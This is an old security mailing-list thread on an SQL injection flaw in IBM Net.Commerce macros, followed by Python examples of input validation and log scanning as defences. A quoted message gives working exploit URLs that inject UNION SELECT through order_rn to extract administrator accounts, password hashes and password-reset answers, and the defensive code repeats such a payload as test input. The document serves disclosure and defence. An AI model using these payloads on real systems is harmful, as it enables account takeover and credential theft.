Re: IBM NetCommerce Security

2001-02-06 Thread rudi carell

>Those look really funny, anyone know what algorithm is used, I suppose
>it's the standard db2 function, but haven't tried that yet.

.. because of the column type this is just a hexadecimal representation ..
you can easily convert it to char ...


> > 3) "Password-Reminders"
>Actually these are the answers of the authentication questions, asked
>for confirming the user's identity (which hints that the passwords may be
>decryptable)

... once you got the right answer you are able to change or at least reset
the password .. and .. that's the trick :)


>I just confirmed that on Net.Commerce 3.1.2 and it's a really nasty bug.
>One may query virtually any data from the db from almost any
>macro (default & custom). I don't believe it's an error in
>net.data.

... it is def. a "classic" "no-input-validation" :-) hole ...



rc

Re: IBM NetCommerce Security

2001-02-06 Thread Gedanken

On Tue, 6 Feb 2001, Emil Popov wrote:

> Any thoughts, fixes, ideas??

The best way is to add 0 to the order_rn before using it.  If the
operation passes, the input was an int.  If it failed, then it wasn't and
something funky was attempted.  This is obviously only going to prevent
munging of integer fields but that's the vast majority.

It's been a while since I coded n.c sites so I do not recall the exact
Add() function, but memory seems to tell me that there was even a
SecurityCheck function in the engine (and undocumented I believe) that did
this exact functionality for you.  If I had an install in front of me, I
would search the default macros for 'SecurityCheck' or some variant.

--
gedanken
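
The integer check Gedanken describes, written out as an added example (not code from the thread or from IBM's product): the parameter is parsed as an integer before it goes anywhere near SQL, and the value is then bound with a placeholder instead of being pasted into the WHERE clause. Net.Commerce macros were Net.Data .d2w files running against DB2; this example stands in an in-memory SQLite database with a constructed ORDERS/SHOPPER layout, so the table and column names are assumptions, not the product's schema.

```python
"""Added example: strict integer validation of a numeric macro parameter
(the "add 0 to order_rn" idea from the thread, done as an explicit parse)
plus a parameterised query, shown against an in-memory SQLite table.
The table layout and sample rows below are constructed for illustration."""
import re
import sqlite3

# An integer parameter is accepted only if it is entirely digits (optionally a
# leading minus sign). Anything else, including a value with a UNION appended,
# is rejected before it reaches the database.
_INT_RE = re.compile(r"^-?\d{1,10}$")


def parse_order_rn(raw: str) -> int:
    """Return the integer value of order_rn, or raise ValueError."""
    cleaned = raw.strip()
    if not _INT_RE.fullmatch(cleaned):
        raise ValueError(f"order_rn is not an integer: {raw!r}")
    return int(cleaned)


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the shop's ORDERS and SHOPPER tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE orders (orrfnbr INTEGER PRIMARY KEY, mestname TEXT, total REAL);
        CREATE TABLE shopper (shlogid TEXT, shlpswd TEXT, shshtyp TEXT);
        INSERT INTO orders VALUES (9, 'Alice Example', 42.50);
        INSERT INTO shopper VALUES ('ncadmin', 'hexdigest_placeholder', 'A');
        """
    )
    return conn


def lookup_order_unsafe(conn: sqlite3.Connection, raw_order_rn: str) -> list:
    """The pattern the thread describes: the raw parameter is pasted into the WHERE clause."""
    sql = f"SELECT mestname, total FROM orders WHERE orrfnbr = {raw_order_rn}"
    return conn.execute(sql).fetchall()


def lookup_order_safe(conn: sqlite3.Connection, raw_order_rn: str) -> list:
    """Validate the type first, then bind the value; the database never sees raw text."""
    order_rn = parse_order_rn(raw_order_rn)
    return conn.execute(
        "SELECT mestname, total FROM orders WHERE orrfnbr = ?", (order_rn,)
    ).fetchall()


if __name__ == "__main__":
    db = build_demo_db()
    print(lookup_order_safe(db, "9"))
    try:
        lookup_order_safe(db, "9 union select shlpswd as mestname,0 from shopper")
    except ValueError as exc:
        print("rejected:", exc)
```

The two checks are independent: the parse guarantees the parameter is an integer, and the placeholder guarantees that even an integer is passed as a value rather than as SQL text. Doing only the "add 0" arithmetic check leaves every string-typed parameter untouched, which is the limitation Gedanken points out.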



Re: IBM NetCommerce Security

2001-02-06 Thread Emil Popov

> exploit:
>
>
> a few examples:
>
> 1) "HowTo find Administrator Accounts"
>
+http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+s
+hlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';
>
> 2) "Passwords(crypted)"
>
+http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+s
+hlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
>

Those look really funny, anyone know what algorithm is used, I suppose
it's the standard db2 function, but haven't tried that yet.

> 3) "Password-Reminders"
>
+http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+s
+hchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

Actually these are the answers of the authentication questions, asked for
confirming the user's identity (which hints that the passwords may be decryptable)

>
> of course "orderdspc.d2w" is not the only vulnerable macro .. it's just an
> example. casting between different data-types is possible (read the db2 man
> pages).
>
> also it should (not proven) be possible to query other databases.


I just confirmed that on Net.Commerce 3.1.2 and it's a really nasty bug.
One may query virtually any data from the db from almost any
macro (default & custom). I don't believe it's an error in
net.data. The whole concept is buggy: most of the info returned by queries
is thrown in the HTML in one form or another, and the macros usually trust the
parameters passed to them and (like the order_rn) put them directly into the
'where' clause of the selects, thus allowing the attacker's 'union' to be
sent to the db as a normal SQL request from the macro :(
It's quite difficult to think of a quick-fix for such a major
issue, but it seems that IBM is not releasing a patch for a
product they consider obsolete and superseded by WebSphere, or
at least I couldn't find one.

Any thoughts, fixes, ideas??

~~~
Regards
Emil Popov
[EMAIL PROTECTED]
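
Since no vendor patch was available, one thing a site could do in the meantime is watch the web-server logs for macro requests whose numeric parameters carry anything but a number. The following is an added example, not code from the thread or from IBM: it parses Common Log Format lines, picks out requests to the ExecMacro/<macro>.d2w/<report> path form quoted above, and flags any order_rn value that is not a plain integer or that contains SQL keywords. The log lines, client addresses and timestamps are constructed for the example.

```python
"""Added example: flagging requests that abuse numeric Net.Commerce macro
parameters, run over constructed web-server access-log lines. The request
paths follow the ExecMacro/<macro>.d2w/report form quoted in the thread;
everything else in the sample log is made up for this example."""
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the thread identifies as integers that macros drop straight into a WHERE clause.
INTEGER_PARAMS = {"order_rn"}
MACRO_PATH = re.compile(r"^/cgi-bin/ncommerce\d*/ExecMacro/[^/]+\.d2w/\w+$")
SQL_WORDS = re.compile(r"\b(union|select|from|where)\b", re.IGNORECASE)

# Common Log Format: host ident user [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample log: one normal lookup, one UNION attempt, one unrelated
# request, and one malformed integer that the macro probably choked on.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Feb/2001:10:01:02 +0000] "GET /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9 HTTP/1.0" 200 1834
10.0.0.7 - - [06/Feb/2001:10:01:09 +0000] "GET /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+x,0+from+shopper HTTP/1.0" 200 2210
10.0.0.8 - - [06/Feb/2001:10:02:11 +0000] "GET /images/logo.gif HTTP/1.0" 200 512
10.0.0.9 - - [06/Feb/2001:10:02:40 +0000] "GET /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=12abc HTTP/1.0" 500 0
"""


def inspect_request(target: str) -> list[str]:
    """Return the reasons a macro request looks like parameter tampering (empty if clean)."""
    parts = urlsplit(target)
    if not MACRO_PATH.match(parts.path):
        return []
    reasons = []
    # parse_qs decodes %xx escapes and turns '+' into spaces, so the check
    # sees the same text the macro would have pasted into its query.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
                reasons.append(f"{name} is not an integer: {value!r}")
            if SQL_WORDS.search(value):
                reasons.append(f"{name} contains SQL keywords: {value!r}")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse each log line and collect the ones whose macro request was flagged."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, when, _method, target, status = m.groups()
        reasons = inspect_request(target)
        if reasons:
            findings.append(
                {"client": client, "time": when, "status": status, "reasons": reasons}
            )
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["status"], "; ".join(hit["reasons"]))
```

The integer test is the same one the macro should have applied; running it over the logs after the fact shows how many requests would have been rejected, and the keyword test catches tampering with string parameters that the integer check alone cannot see.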